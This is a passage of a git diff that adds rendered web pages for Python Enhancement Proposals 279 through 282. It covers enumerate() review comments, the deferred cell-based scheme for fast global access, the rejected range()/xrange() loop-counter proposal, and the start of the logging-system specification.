Note D: This function was originally proposed with optional start +and stop arguments. GvR pointed out that the function call +enumerate(seqn,4,6) had an alternate, plausible interpretation as +a slice that would return the fourth and fifth elements of the +sequence. To avoid the ambiguity, the optional arguments were +dropped even though it meant losing flexibility as a loop counter. +That flexibility was most important for the common case of +counting from one, as in:

+
for linenum, line in enumerate(source,1):  print linenum, line
+
+
+
+
Comments from GvR:
filter and map should die and be subsumed into list +comprehensions, not grow more variants. I’d rather introduce +built-ins that do iterator algebra (e.g. the iterzip that I’ve +often used as an example).

I like the idea of having some way to iterate over a sequence +and its index set in parallel. It’s fine for this to be a +built-in.

+

I don’t like the name “indexed”; adjectives do not make good +function names. Maybe iterindexed()?

+
+
Comments from Ka-Ping Yee:
I’m also quite happy with everything you +proposed … and the extra built-ins (really ‘indexed’ in +particular) are things I have wanted for a long time.
+
Comments from Neil Schemenauer:
The new built-ins sound okay. Guido +may be concerned with increasing the number of built-ins too +much. You might be better off selling them as part of a +module. If you use a module then you can add lots of useful +functions (Haskell has lots of them that we could steal).
+
Comments for Magnus Lie Hetland:
I think indexed would be a useful and +natural built-in function. I would certainly use it a lot. I +like indexed() a lot; +1. I’m quite happy to have it make PEP +281 obsolete. Adding a separate module for iterator utilities +seems like a good idea.
+
Comments from the Community:
The response to the enumerate() proposal +has been close to 100% favorable. Almost everyone loves the +idea.
+
Author response:
Prior to these comments, four built-ins were proposed. +After the comments, xmap, xfilter and xzip were withdrawn. The +one that remains is vital for the language and is proposed by +itself. Indexed() is trivially easy to implement and can be +documented in minutes. More importantly, it is useful in +everyday programming which does not otherwise involve explicit +use of generators.

This proposal originally included another function iterzip(). +That was subsequently implemented as the izip() function in +the itertools module.

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0279.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0280/index.html b/pep-0280/index.html new file mode 100644 index 00000000000..f62b4c664a4 --- /dev/null +++ b/pep-0280/index.html @@ -0,0 +1,619 @@ + + + + + + + + PEP 280 – Optimizing access to globals | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 280 – Optimizing access to globals

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
10-Feb-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Deferral

+

While this PEP is a nice idea, no-one has yet emerged to do the work of +hashing out the differences between this PEP, PEP 266 and PEP 267. +Hence, it is being deferred.

+
+
+

Abstract

+

This PEP describes yet another approach to optimizing access to +module globals, providing an alternative to PEP 266 (Optimizing +Global Variable/Attribute Access by Skip Montanaro) and PEP 267 +(Optimized Access to Module Namespaces by Jeremy Hylton).

+

The expectation is that eventually one approach will be picked and +implemented; possibly multiple approaches will be prototyped +first.

+
+
+

Description

+

(Note: Jason Orendorff writes: “””I implemented this once, long +ago, for Python 1.5-ish, I believe. I got it to the point where +it was only 15% slower than ordinary Python, then abandoned it. +;) In my implementation, “cells” were real first-class objects, +and “celldict” was a copy-and-hack version of dictionary. I +forget how the rest worked.””” Reference: +https://mail.python.org/pipermail/python-dev/2002-February/019876.html)

+

Let a cell be a really simple Python object, containing a pointer +to a Python object and a pointer to a cell. Both pointers may be +NULL. A Python implementation could be:

+
class cell(object):
+
+    def __init__(self):
+        self.objptr = NULL
+        self.cellptr = NULL
+
+
+

The cellptr attribute is used for chaining cells together for +searching built-ins; this will be explained later.

+

Let a celldict be a mapping from strings (the names of a module’s +globals) to objects (the values of those globals), implemented +using a dict of cells. A Python implementation could be:

+
class celldict(object):
+
+    def __init__(self):
+        self.__dict = {} # dict of cells
+
+    def getcell(self, key):
+        c = self.__dict.get(key)
+        if c is None:
+            c = cell()
+            self.__dict[key] = c
+        return c
+
+    def cellkeys(self):
+        return self.__dict.keys()
+
+    def __getitem__(self, key):
+        c = self.__dict.get(key)
+        if c is None:
+            raise KeyError, key
+        value = c.objptr
+        if value is NULL:
+            raise KeyError, key
+        else:
+            return value
+
+    def __setitem__(self, key, value):
+        c = self.__dict.get(key)
+        if c is None:
+            c = cell()
+            self.__dict[key] = c
+        c.objptr = value
+
+    def __delitem__(self, key):
+        c = self.__dict.get(key)
+        if c is None or c.objptr is NULL:
+            raise KeyError, key
+        c.objptr = NULL
+
+    def keys(self):
+        return [k for k, c in self.__dict.iteritems()
+                if c.objptr is not NULL]
+
+    def items(self):
+        return [k, c.objptr for k, c in self.__dict.iteritems()
+                if c.objptr is not NULL]
+
+    def values(self):
+        preturn [c.objptr for c in self.__dict.itervalues()
+                if c.objptr is not NULL]
+
+    def clear(self):
+        for c in self.__dict.values():
+            c.objptr = NULL
+
+    # Etc.
+
+
+

It is possible that a cell exists corresponding to a given key, +but the cell’s objptr is NULL; let’s call such a cell empty. When +the celldict is used as a mapping, it is as if empty cells don’t +exist. However, once added, a cell is never deleted from a +celldict, and it is possible to get at empty cells using the +getcell() method.

+

The celldict implementation never uses the cellptr attribute of +cells.

+

We change the module implementation to use a celldict for its +__dict__. The module’s getattr, setattr and delattr operations +now map to getitem, setitem and delitem on the celldict. The type +of <module>.__dict__ and globals() is probably the only backwards +incompatibility.

+

When a module is initialized, its __builtins__ is initialized from +the __builtin__ module’s __dict__, which is itself a celldict. +For each cell in __builtins__, the new module’s __dict__ adds a +cell with a NULL objptr, whose cellptr points to the corresponding +cell of __builtins__. Python pseudo-code (ignoring rexec):

+
import __builtin__
+
+class module(object):
+
+    def __init__(self):
+        self.__dict__ = d = celldict()
+        d['__builtins__'] = bd = __builtin__.__dict__
+        for k in bd.cellkeys():
+            c = self.__dict__.getcell(k)
+            c.cellptr = bd.getcell(k)
+
+    def __getattr__(self, k):
+        try:
+            return self.__dict__[k]
+        except KeyError:
+            raise IndexError, k
+
+    def __setattr__(self, k, v):
+        self.__dict__[k] = v
+
+    def __delattr__(self, k):
+        del self.__dict__[k]
+
+
+

The compiler generates LOAD_GLOBAL_CELL <i> (and STORE_GLOBAL_CELL +<i> etc.) opcodes for references to globals, where <i> is a small +index with meaning only within one code object like the const +index in LOAD_CONST. The code object has a new tuple, co_globals, +giving the names of the globals referenced by the code indexed by +<i>. No new analysis is required to be able to do this.

+

When a function object is created from a code object and a celldict, +the function object creates an array of cell pointers by asking the +celldict for cells corresponding to the names in the code object’s +co_globals. If the celldict doesn’t already have a cell for a +particular name, it creates and an empty one. This array of cell +pointers is stored on the function object as func_cells. When a +function object is created from a regular dict instead of a +celldict, func_cells is a NULL pointer.

+

When the VM executes a LOAD_GLOBAL_CELL <i> instruction, it gets +cell number <i> from func_cells. It then looks in the cell’s +PyObject pointer, and if not NULL, that’s the global value. If it +is NULL, it follows the cell’s cell pointer to the next cell, if it +is not NULL, and looks in the PyObject pointer in that cell. If +that’s also NULL, or if there is no second cell, NameError is +raised. (It could follow the chain of cell pointers until a NULL +cell pointer is found; but I have no use for this.) Similar for +STORE_GLOBAL_CELL <i>, except it doesn’t follow the cell pointer +chain – it always stores in the first cell.

+

There are fallbacks in the VM for the case where the function’s +globals aren’t a celldict, and hence func_cells is NULL. In that +case, the code object’s co_globals is indexed with <i> to find the +name of the corresponding global and this name is used to index the +function’s globals dict.

+
+
+

Additional Ideas

+
    +
  • Never make func_cell a NULL pointer; instead, make up an array +of empty cells, so that LOAD_GLOBAL_CELL can index func_cells +without a NULL check.
  • +
  • Make c.cellptr equal to c when a cell is created, so that +LOAD_GLOBAL_CELL can always dereference c.cellptr without a NULL +check.

    With these two additional ideas added, here’s Python pseudo-code +for LOAD_GLOBAL_CELL:

    +
    def LOAD_GLOBAL_CELL(self, i):
    +    # self is the frame
    +    c = self.func_cells[i]
    +    obj = c.objptr
    +    if obj is not NULL:
    +        return obj # Existing global
    +    return c.cellptr.objptr # Built-in or NULL
    +
    +
    +
  • +
  • Be more aggressive: put the actual values of builtins into module +dicts, not just pointers to cells containing the actual values.

    There are two points to this: (1) Simplify and speed access, which +is the most common operation. (2) Support faithful emulation of +extreme existing corner cases.

    +

    WRT #2, the set of builtins in the scheme above is captured at the +time a module dict is first created. Mutations to the set of builtin +names following that don’t get reflected in the module dicts. Example: +consider files main.py and cheater.py:

    +
    [main.py]
    +import cheater
    +def f():
    +    cheater.cheat()
    +    return pachinko()
    +print f()
    +
    +[cheater.py]
    +def cheat():
    +    import __builtin__
    +    __builtin__.pachinko = lambda: 666
    +
    +
    +

    If main.py is run under Python 2.2 (or before), 666 is printed. But +under the proposal, __builtin__.pachinko doesn’t exist at the time +main’s __dict__ is initialized. When the function object for +f is created, main.__dict__ grows a pachinko cell mapping to two +NULLs. When cheat() is called, __builtin__.__dict__ grows a pachinko +cell too, but main.__dict__ doesn’t know– and will never know –about +that. When f’s return stmt references pachinko, in will still find +the double-NULLs in main.__dict__’s pachinko cell, and so raise +NameError.

    +

    A similar (in cause) break in compatibility can occur if a module +global foo is del’ed, but a builtin foo was created prior to that +but after the module dict was first created. Then the builtin foo +becomes visible in the module under 2.2 and before, but remains +invisible under the proposal.

    +

    Mutating builtins is extremely rare (most programs never mutate the +builtins, and it’s hard to imagine a plausible use for frequent +mutation of the builtins – I’ve never seen or heard of one), so it +doesn’t matter how expensive mutating the builtins becomes. OTOH, +referencing globals and builtins is very common. Combining those +observations suggests a more aggressive caching of builtins in module +globals, speeding access at the expense of making mutations of the +builtins (potentially much) more expensive to keep the caches in +synch.

    +

    Much of the scheme above remains the same, and most of the rest is +just a little different. A cell changes to:

    +
    class cell(object):
    +    def __init__(self, obj=NULL, builtin=0):
    +        self.objptr = obj
    +        self.builtinflag = builtin
    +
    +
    +

    and a celldict maps strings to this version of cells. builtinflag +is true when and only when objptr contains a value obtained from +the builtins; in other words, it’s true when and only when a cell +is acting as a cached value. When builtinflag is false, objptr is +the value of a module global (possibly NULL). celldict changes to:

    +
    class celldict(object):
    +
    +    def __init__(self, builtindict=()):
    +        self.basedict = builtindict
    +        self.__dict = d = {}
    +        for k, v in builtindict.items():
    +            d[k] = cell(v, 1)
    +
    +    def __getitem__(self, key):
    +        c = self.__dict.get(key)
    +        if c is None or c.objptr is NULL or c.builtinflag:
    +            raise KeyError, key
    +        return c.objptr
    +
    +    def __setitem__(self, key, value):
    +        c = self.__dict.get(key)
    +        if c is None:
    +            c = cell()
    +            self.__dict[key] = c
    +        c.objptr = value
    +        c.builtinflag = 0
    +
    +    def __delitem__(self, key):
    +        c = self.__dict.get(key)
    +        if c is None or c.objptr is NULL or c.builtinflag:
    +            raise KeyError, key
    +        c.objptr = NULL
    +        # We may have unmasked a builtin.  Note that because
    +        # we're checking the builtin dict for that *now*, this
    +        # still works if the builtin first came into existence
    +        # after we were constructed.  Note too that del on
    +        # namespace dicts is rare, so the expense of this check
    +        # shouldn't matter.
    +        if key in self.basedict:
    +            c.objptr = self.basedict[key]
    +            assert c.objptr is not NULL # else "in" lied
    +            c.builtinflag = 1
    +        else:
    +            # There is no builtin with the same name.
    +            assert not c.builtinflag
    +
    +    def keys(self):
    +        return [k for k, c in self.__dict.iteritems()
    +                if c.objptr is not NULL and not c.builtinflag]
    +
    +    def items(self):
    +        return [k, c.objptr for k, c in self.__dict.iteritems()
    +                if c.objptr is not NULL and not c.builtinflag]
    +
    +    def values(self):
    +        preturn [c.objptr for c in self.__dict.itervalues()
    +                if c.objptr is not NULL and not c.builtinflag]
    +
    +    def clear(self):
    +        for c in self.__dict.values():
    +            if not c.builtinflag:
    +                c.objptr = NULL
    +
    +    # Etc.
    +
    +
    +

    The speed benefit comes from simplifying LOAD_GLOBAL_CELL, which +I expect is executed more frequently than all other namespace +operations combined:

    +
    def LOAD_GLOBAL_CELL(self, i):
    +    # self is the frame
    +    c = self.func_cells[i]
    +    return c.objptr   # may be NULL (also true before)
    +
    +
    +

    That is, accessing builtins and accessing module globals are equally +fast. For module globals, a NULL-pointer test+branch is saved. For +builtins, an additional pointer chase is also saved.

    +

    The other part needed to make this fly is expensive, propagating +mutations of builtins into the module dicts that were initialized +from the builtins. This is much like, in 2.2, propagating changes +in new-style base classes to their descendants: the builtins need to +maintain a list of weakrefs to the modules (or module dicts) +initialized from the builtin’s dict. Given a mutation to the builtin +dict (adding a new key, changing the value associated with an +existing key, or deleting a key), traverse the list of module dicts +and make corresponding mutations to them. This is straightforward; +for example, if a key is deleted from builtins, execute +reflect_bltin_del in each module:

    +
    def reflect_bltin_del(self, key):
    +    c = self.__dict.get(key)
    +    assert c is not None # else we were already out of synch
    +    if c.builtinflag:
    +        # Put us back in synch.
    +        c.objptr = NULL
    +        c.builtinflag = 0
    +    # Else we're shadowing the builtin, so don't care that
    +    # the builtin went away.
    +
    +
    +

    Note that c.builtinflag protects from us erroneously deleting a +module global of the same name. Adding a new (key, value) builtin +pair is similar:

    +
    def reflect_bltin_new(self, key, value):
    +    c = self.__dict.get(key)
    +    if c is None:
    +        # Never heard of it before:  cache the builtin value.
    +        self.__dict[key] = cell(value, 1)
    +    elif c.objptr is NULL:
    +        # This used to exist in the module or the builtins,
    +        # but doesn't anymore; rehabilitate it.
    +        assert not c.builtinflag
    +        c.objptr = value
    +        c.builtinflag = 1
    +    else:
    +        # We're shadowing it already.
    +        assert not c.builtinflag
    +
    +
    +

    Changing the value of an existing builtin:

    +
    def reflect_bltin_change(self, key, newvalue):
    +    c = self.__dict.get(key)
    +    assert c is not None # else we were already out of synch
    +    if c.builtinflag:
    +        # Put us back in synch.
    +        c.objptr = newvalue
    +    # Else we're shadowing the builtin, so don't care that
    +    # the builtin changed.
    +
    +
    +
  • +
+
+
+

FAQs

+
    +
  • Q: Will it still be possible to:

    a) install new builtins in the __builtin__ namespace and have +them available in all already loaded modules right away ?

    +

    b) override builtins (e.g. open()) with my own copies +(e.g. to increase security) in a way that makes these new +copies override the previous ones in all modules ?

    +

    A: Yes, this is the whole point of this design. In the original +approach, when LOAD_GLOBAL_CELL finds a NULL in the second +cell, it should go back to see if the __builtins__ dict has +been modified (the pseudo code doesn’t have this yet). Tim’s +“more aggressive” alternative also takes care of this.

    +
  • +
  • Q: How does the new scheme get along with the restricted execution +model?

    A: It is intended to support that fully.

    +
  • +
  • Q: What happens when a global is deleted?

    A: The module’s celldict would have a cell with a NULL objptr for +that key. This is true in both variations, but the “aggressive” +variation goes on to see whether this unmasks a builtin of the +same name, and if so copies its value (just a pointer-copy of the +ultimate PyObject*) into the cell’s objptr and sets the cell’s +builtinflag to true.

    +
  • +
  • Q: What would the C code for LOAD_GLOBAL_CELL look like?

    A: The first version, with the first two bullets under “Additional +ideas” incorporated, could look like this:

    +
    case LOAD_GLOBAL_CELL:
    +    cell = func_cells[oparg];
    +    x = cell->objptr;
    +    if (x == NULL) {
    +        x = cell->cellptr->objptr;
    +        if (x == NULL) {
    +            ... error recovery ...
    +            break;
    +        }
    +    }
    +    Py_INCREF(x);
    +    PUSH(x);
    +    continue;
    +
    +
    +

    We could even write it like this (idea courtesy of Ka-Ping Yee):

    +
    case LOAD_GLOBAL_CELL:
    +    cell = func_cells[oparg];
    +    x = cell->cellptr->objptr;
    +    if (x != NULL) {
    +        Py_INCREF(x);
    +        PUSH(x);
    +        continue;
    +    }
    +    ... error recovery ...
    +    break;
    +
    +
    +

    In modern CPU architectures, this reduces the number of +branches taken for built-ins, which might be a really good +thing, while any decent memory cache should realize that +cell->cellptr is the same as cell for regular globals and hence +this should be very fast in that case too.

    +

    For the aggressive variant:

    +
    case LOAD_GLOBAL_CELL:
    +    cell = func_cells[oparg];
    +    x = cell->objptr;
    +    if (x != NULL) {
    +        Py_INCREF(x);
    +        PUSH(x);
    +        continue;
    +    }
    +    ... error recovery ...
    +    break;
    +
    +
    +
  • +
  • Q: What happens in the module’s top-level code where there is +presumably no func_cells array?

    A: We could do some code analysis and create a func_cells array, +or we could use LOAD_NAME which should use PyMapping_GetItem on +the globals dict.

    +
  • +
+
+
+

Graphics

+

Ka-Ping Yee supplied a drawing of the state of things after +“import spam”, where spam.py contains:

+
import eggs
+
+i = -2
+max = 3
+
+def foo(n):
+    y = abs(i) + max
+    return eggs.ham(y + n)
+
+
+

The drawing is at http://web.lfw.org/repo/cells.gif; a larger +version is at http://lfw.org/repo/cells-big.gif; the source is at +http://lfw.org/repo/cells.ai.

+
+
+

Comparison

+

XXX Here, a comparison of the three approaches could be added.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0280.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0281/index.html b/pep-0281/index.html new file mode 100644 index 00000000000..3b55c9bc75e --- /dev/null +++ b/pep-0281/index.html @@ -0,0 +1,251 @@ + + + + + + + + PEP 281 – Loop Counter Iteration with range and xrange | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 281 – Loop Counter Iteration with range and xrange

+
+
Author:
+
Magnus Lie Hetland <magnus at hetland.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Feb-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes yet another way of exposing the loop counter in +for-loops. It basically proposes that the functionality of the +function indices() from PEP 212 be included in the existing +functions range() and xrange().

+
+
+

Pronouncement

+

In commenting on PEP 279’s enumerate() function, this PEP’s author +offered, “I’m quite happy to have it make PEP 281 obsolete.” +Subsequently, PEP 279 was accepted into Python 2.3.

+

On 17 June 2005, the BDFL concurred with it being obsolete and +hereby rejected the PEP. For the record, he found some of the +examples to somewhat jarring in appearance:

+
>>> range(range(5), range(10), range(2))
+[5, 7, 9]
+
+
+
+
+

Motivation

+

It is often desirable to loop over the indices of a sequence. PEP +212 describes several ways of doing this, including adding a +built-in function called indices, conceptually defined as:

+
def indices(sequence):
+    return range(len(sequence))
+
+
+

On the assumption that adding functionality to an existing built-in +function may be less intrusive than adding a new built-in function, +this PEP proposes adding this functionality to the existing +functions range() and xrange().

+
+
+

Specification

+

It is proposed that all three arguments to the built-in functions +range() and xrange() are allowed to be objects with a length +(i.e. objects implementing the __len__ method). If an argument +cannot be interpreted as an integer (i.e. it has no __int__ +method), its length will be used instead.

+

Examples:

+
>>> range(range(10))
+[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
+>>> range(range(5), range(10))
+[5, 6, 7, 8, 9]
+>>> range(range(5), range(10), range(2))
+[5, 7, 9]
+>>> list(xrange(range(10)))
+[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
+>>> list(xrange(xrange(10)))
+[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
+
+# Number the lines of a file:
+lines = file.readlines()
+for num in range(lines):
+    print num, lines[num]
+
+
+
+
+

Alternatives

+

A natural alternative to the above specification is allowing +xrange() to access its arguments in a lazy manner. Thus, instead +of using their length explicitly, xrange can return one index for +each element of the stop argument until the end is reached. A +similar lazy treatment makes little sense for the start and step +arguments since their length must be calculated before iteration +can begin. (Actually, the length of the step argument isn’t needed +until the second element is returned.)

+

A pseudo-implementation (using only the stop argument, and assuming +that it is iterable) is:

+
def xrange(stop):
+    i = 0
+    for x in stop:
+        yield i
+        i += 1
+
+
+

Testing whether to use int() or lazy iteration could be done by +checking for an __iter__ attribute. (This example assumes the +presence of generators, but could easily have been implemented as a +plain iterator object.)

+

It may be questionable whether this feature is truly useful, since +one would not be able to access the elements of the iterable object +inside the for loop through indexing.

+

Example:

+
# Printing the numbers of the lines of a file:
+for num in range(file):
+    print num # The line itself is not accessible
+
+
+

A more controversial alternative (to deal with this) would be to +let range() behave like the function irange() of PEP 212 when +supplied with a sequence.

+

Example:

+
>>> range(5)
+[0, 1, 2, 3, 4]
+>>> range('abcde')
+[(0, 'a'), (1, 'b'), (2, 'c'), (3, 'd'), (4, 'e')]
+
+
+
+
+

Backwards Compatibility

+

The proposal could cause backwards incompatibilities if arguments +are used which implement both __int__ and __len__ (or __iter__ in +the case of lazy iteration with xrange). The author does not +believe that this is a significant problem.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0281.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0282/index.html b/pep-0282/index.html new file mode 100644 index 00000000000..c1dc6da0a0c --- /dev/null +++ b/pep-0282/index.html @@ -0,0 +1,742 @@ + + + + + + + + PEP 282 – A Logging System | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 282 – A Logging System

+
+
Author:
+
Vinay Sajip <vinay_sajip at red-dove.com>, +Trent Mick <trentm at activestate.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
04-Feb-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a proposed logging package for Python’s +standard library.

+

Basically the system involves the user creating one or more logger +objects on which methods are called to log debugging notes, +general information, warnings, errors etc. Different logging +‘levels’ can be used to distinguish important messages from less +important ones.

+

A registry of named singleton logger objects is maintained so that

+
    +
  1. different logical logging streams (or ‘channels’) exist +(say, one for ‘zope.zodb’ stuff and another for +‘mywebsite’-specific stuff)
  2. +
  3. one does not have to pass logger object references around.
  4. +
+

The system is configurable at runtime. This configuration +mechanism allows one to tune the level and type of logging done +while not touching the application itself.

+
+
+

Motivation

+

If a single logging mechanism is enshrined in the standard +library, 1) logging is more likely to be done ‘well’, and 2) +multiple libraries will be able to be integrated into larger +applications which can be logged reasonably coherently.

+
+
+

Influences

+

This proposal was put together after having studied the +following logging packages:

+
    +
  • java.util.logging in JDK 1.4 (a.k.a. JSR047) [1]
  • +
  • log4j [2]
  • +
  • the Syslog package from the Protomatter project [3]
  • +
  • MAL’s mx.Log package [4]
  • +
+
+
+

Simple Example

+

This shows a very simple example of how the logging package can be +used to generate simple logging output on stderr.

+
--------- mymodule.py -------------------------------
+import logging
+log = logging.getLogger("MyModule")
+
+def doIt():
+        log.debug("Doin' stuff...")
+        #do stuff...
+        raise TypeError, "Bogus type error for testing"
+-----------------------------------------------------
+
+
+
--------- myapp.py ----------------------------------
+import mymodule, logging
+
+logging.basicConfig()
+
+log = logging.getLogger("MyApp")
+
+log.info("Starting my app")
+try:
+        mymodule.doIt()
+except Exception, e:
+        log.exception("There was a problem.")
+log.info("Ending my app")
+-----------------------------------------------------
+
+
+
$ python myapp.py
+
+INFO:MyApp: Starting my app
+DEBUG:MyModule: Doin' stuff...
+ERROR:MyApp: There was a problem.
+Traceback (most recent call last):
+        File "myapp.py", line 9, in ?
+                mymodule.doIt()
+        File "mymodule.py", line 7, in doIt
+                raise TypeError, "Bogus type error for testing"
+TypeError: Bogus type error for testing
+
+INFO:MyApp: Ending my app
+
+
+

The above example shows the default output format. All +aspects of the output format should be configurable, so that +you could have output formatted like this:

+
2002-04-19 07:56:58,174 MyModule   DEBUG - Doin' stuff...
+
+or just
+
+Doin' stuff...
+
+
+
+
+

Control Flow

+

Applications make logging calls on Logger objects. Loggers are +organized in a hierarchical namespace and child Loggers inherit +some logging properties from their parents in the namespace.

+

Logger names fit into a “dotted name” namespace, with dots +(periods) indicating sub-namespaces. The namespace of logger +objects therefore corresponds to a single tree data structure.

+
    +
  • "" is the root of the namespace
  • +
  • "Zope" would be a child node of the root
  • +
  • "Zope.ZODB" would be a child node of "Zope"
  • +
+

These Logger objects create LogRecord objects which are passed +to Handler objects for output. Both Loggers and Handlers may +use logging levels and (optionally) Filters to decide if they +are interested in a particular LogRecord. When it is necessary to +output a LogRecord externally, a Handler can (optionally) use a +Formatter to localize and format the message before sending it +to an I/O stream.

+

Each Logger keeps track of a set of output Handlers. By default +all Loggers also send their output to all Handlers of their +ancestor Loggers. Loggers may, however, also be configured to +ignore Handlers higher up the tree.

+

The APIs are structured so that calls on the Logger APIs can be +cheap when logging is disabled. If logging is disabled for a +given log level, then the Logger can make a cheap comparison test +and return. If logging is enabled for a given log level, the +Logger is still careful to minimize costs before passing the +LogRecord into the Handlers. In particular, localization and +formatting (which are relatively expensive) are deferred until the +Handler requests them.

+

The overall Logger hierarchy can also have a level associated with +it, which takes precedence over the levels of individual Loggers. +This is done through a module-level function:

+
def disable(lvl):
+    """
+    Do not generate any LogRecords for requests with a severity less
+    than 'lvl'.
+    """
+    ...
+
+
+
+
+

Levels

+

The logging levels, in increasing order of importance, are:

+
    +
  • DEBUG
  • +
  • INFO
  • +
  • WARN
  • +
  • ERROR
  • +
  • CRITICAL
  • +
+

The term CRITICAL is used in preference to FATAL, which is used by +log4j. The levels are conceptually the same - that of a serious, +or very serious, error. However, FATAL implies death, which in +Python implies a raised and uncaught exception, traceback, and +exit. Since the logging module does not enforce such an outcome +from a FATAL-level log entry, it makes sense to use CRITICAL in +preference to FATAL.

+

These are just integer constants, to allow simple comparison of +importance. Experience has shown that too many levels can be +confusing, as they lead to subjective interpretation of which +level should be applied to any particular log request.

+

Although the above levels are strongly recommended, the logging +system should not be prescriptive. Users may define their own +levels, as well as the textual representation of any levels. User +defined levels must, however, obey the constraints that they are +all positive integers and that they increase in order of +increasing severity.

+

User-defined logging levels are supported through two module-level +functions:

+
def getLevelName(lvl):
+        """Return the text for level 'lvl'."""
+        ...
+
+def addLevelName(lvl, lvlName):
+        """
+        Add the level 'lvl' with associated text 'levelName', or
+        set the textual representation of existing level 'lvl' to be
+        'lvlName'."""
+        ...
+
+
+
+
+

Loggers

+

Each Logger object keeps track of a log level (or threshold) that +it is interested in, and discards log requests below that level.

+

A Manager class instance maintains the hierarchical namespace of +named Logger objects. Generations are denoted with dot-separated +names: Logger “foo” is the parent of Loggers “foo.bar” and +“foo.baz”.

+

The Manager class instance is a singleton and is not directly +exposed to users, who interact with it using various module-level +functions.

+

The general logging method is:

+
class Logger:
+    def log(self, lvl, msg, *args, **kwargs):
+        """Log 'str(msg) % args' at logging level 'lvl'."""
+        ...
+
+
+

However, convenience functions are defined for each logging level:

+
class Logger:
+    def debug(self, msg, *args, **kwargs): ...
+    def info(self, msg, *args, **kwargs): ...
+    def warn(self, msg, *args, **kwargs): ...
+    def error(self, msg, *args, **kwargs): ...
+    def critical(self, msg, *args, **kwargs): ...
+
+
+

Only one keyword argument is recognized at present - “exc_info”. +If true, the caller wants exception information to be provided in +the logging output. This mechanism is only needed if exception +information needs to be provided at any logging level. In the +more common case, where exception information needs to be added to +the log only when errors occur, i.e. at the ERROR level, then +another convenience method is provided:

+
class Logger:
+    def exception(self, msg, *args): ...
+
+
+

This should only be called in the context of an exception handler, +and is the preferred way of indicating a desire for exception +information in the log. The other convenience methods are +intended to be called with exc_info only in the unusual situation +where you might want to provide exception information in the +context of an INFO message, for example.

+

The “msg” argument shown above will normally be a format string; +however, it can be any object x for which str(x) returns the +format string. This facilitates, for example, the use of an +object which fetches a locale- specific message for an +internationalized/localized application, perhaps using the +standard gettext module. An outline example:

+
class Message:
+    """Represents a message"""
+    def __init__(self, id):
+        """Initialize with the message ID"""
+
+    def __str__(self):
+        """Return an appropriate localized message text"""
+
+...
+
+logger.info(Message("abc"), ...)
+
+
+

Gathering and formatting data for a log message may be expensive, +and a waste if the logger was going to discard the message anyway. +To see if a request will be honoured by the logger, the +isEnabledFor() method can be used:

+
class Logger:
+    def isEnabledFor(self, lvl):
+        """
+        Return true if requests at level 'lvl' will NOT be
+        discarded.
+        """
+        ...
+
+
+

so instead of this expensive and possibly wasteful DOM to XML +conversion:

+
...
+hamletStr = hamletDom.toxml()
+log.info(hamletStr)
+...
+
+
+

one can do this:

+
if log.isEnabledFor(logging.INFO):
+    hamletStr = hamletDom.toxml()
+    log.info(hamletStr)
+
+
+

When new loggers are created, they are initialized with a level +which signifies “no level”. A level can be set explicitly using +the setLevel() method:

+
class Logger:
+    def setLevel(self, lvl): ...
+
+
+

If a logger’s level is not set, the system consults all its +ancestors, walking up the hierarchy until an explicitly set level +is found. That is regarded as the “effective level” of the +logger, and can be queried via the getEffectiveLevel() method:

+
def getEffectiveLevel(self): ...
+
+
+

Loggers are never instantiated directly. Instead, a module-level +function is used:

+
def getLogger(name=None): ...
+
+
+

If no name is specified, the root logger is returned. Otherwise, +if a logger with that name exists, it is returned. If not, a new +logger is initialized and returned. Here, “name” is synonymous +with “channel name”.

+

Users can specify a custom subclass of Logger to be used by the +system when instantiating new loggers:

+
def setLoggerClass(klass): ...
+
+
+

The passed class should be a subclass of Logger, and its __init__ +method should call Logger.__init__.

+
+
+

Handlers

+

Handlers are responsible for doing something useful with a given +LogRecord. The following core Handlers will be implemented:

+
    +
  • StreamHandler: A handler for writing to a file-like object.
  • +
  • FileHandler: A handler for writing to a single file or set +of rotating files.
  • +
  • SocketHandler: A handler for writing to remote TCP ports.
  • +
  • DatagramHandler: A handler for writing to UDP sockets, for +low-cost logging. Jeff Bauer already had such a system [5].
  • +
  • MemoryHandler: A handler that buffers log records in memory +until the buffer is full or a particular condition occurs +[1].
  • +
  • SMTPHandler: A handler for sending to email addresses via SMTP.
  • +
  • SysLogHandler: A handler for writing to Unix syslog via UDP.
  • +
  • NTEventLogHandler: A handler for writing to event logs on +Windows NT, 2000 and XP.
  • +
  • HTTPHandler: A handler for writing to a Web server with +either GET or POST semantics.
  • +
+

Handlers can also have levels set for them using the +setLevel() method:

+
def setLevel(self, lvl): ...
+
+
+

